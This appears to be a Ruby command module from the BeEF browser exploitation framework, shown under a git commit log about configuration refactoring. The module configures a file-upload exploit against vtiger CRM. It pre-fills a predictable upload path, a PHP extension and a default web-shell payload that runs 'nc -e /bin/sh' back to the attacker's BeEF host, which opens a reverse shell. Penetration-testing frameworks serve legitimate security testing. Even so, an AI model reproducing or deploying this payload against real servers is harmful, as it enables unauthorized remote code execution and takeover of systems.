b6425e4a90
* fixed offline zombie not deleting * Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161) Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1. - [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases) - [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1) --- updated-dependencies: - dependency-name: jsdoc-to-markdown dependency-type: direct:development update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * Bug: Core - 1785 Fixed public hook url configuration settings (#2163) * added spec file for testing changes * added local host getter to configuration class * added default value 0.0.0.0 for local host if it's not set * added port config getter with default * added port config getter with default * fixed spelling errors for port * added public configuration values and validation * removed logic from public port as it was not required * added beef host to configuration class * added beef port to configuration class and removed default http.port logic from public_port * fixed rubocop errors and refactored spec tests * added beef host configuration values used for external resources * added beef url to configuration * added spec file for testing changes * added local host getter to configuration class * added default value 0.0.0.0 for local host if it's not set * added port config getter with default * added port config getter with default * fixed spelling errors for port * added public configuration values and validation * removed logic from public port as it was not required * added beef host to configuration class * added beef port to configuration class and removed default http.port logic from public_port * fixed rubocop errors and refactored spec tests * added beef host configuration values used for external resources * added beef url to configuration * created command spec file * add before statement to load all enabled modules to test command class * add spec to check if configuration instance exists by setting and accessing a config variable * updated http proto for beef host * reverting changes on this file, dev values set * removed some unessessary checks * fixed grammar test now we're only testing one configuration attribute * added hook url for contextual usage * refactoring admin_ui with new code usage * fixed issue with the location of the beef.http.https.public_enabled * refactored powershell module and extension * adding the new config setting for public https beign enabled * refactor qrcode extension * replace video fake plugin refactor * social engineering refactoring * phonegap module refactoring * exploit refactoing * network module refactoing * ipec module refactoring * host module refactoring * debug refactoring * browser refactoring * social engineering extension refactoring * core main server refactoring * core main console banner refactoring * removing dev test * fixed area with location of http.https.enabled * changed the hook url definition to return the hook file path * updated banners to use new configuration getters * updated extensions and modules with the hook url change * added new public.host configuration settings and validations for depicated usage of public * updated to use public.port configuration * added validation for old configuration public_port * updated to use public https configuration setting * updated config with new settings format * fixed get to point to new locations * fixed pointer to hook_file_path * Update extensions/social_engineering/web_cloner/web_cloner.rb Co-authored-by: bcoles <bcoles@gmail.com> * updated enabled to enable * making sure default configuration file does not have preset values Co-authored-by: bcoles <bcoles@gmail.com> * bumped versions to 0.5.2.0 * Usability: #2145. Added user input request for beef update within 'beef' install script (#2162) * added user input request for beef update * swaped git pull from system to backticks * flags added for auto update and timout to input * updated install.txt to reference the update-beef script (#2160) Co-authored-by: Andrew Wheatley <a@andrews-mini.home> Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: bcoles <bcoles@gmail.com>
37 lines
1.5 KiB
Ruby
37 lines
1.5 KiB
Ruby
#
|
|
# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
class Vtiger_crm_upload_exploit < BeEF::Core::Command
|
|
|
|
def self.options
|
|
time = Time.new
|
|
weekno = case time.day
|
|
when 1..7 then 1
|
|
when 8..14 then 2
|
|
when 15..21 then 3
|
|
when 22..28 then 4
|
|
else 5
|
|
end
|
|
|
|
@configuration = BeEF::Core::Configuration.instance
|
|
beef_host = @configuration.beef_host
|
|
return [
|
|
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
|
|
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
|
|
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
|
|
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
|
|
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
|
|
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
|
|
]
|
|
end
|
|
|
|
def post_execute
|
|
return if @datastore['result'].nil?
|
|
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|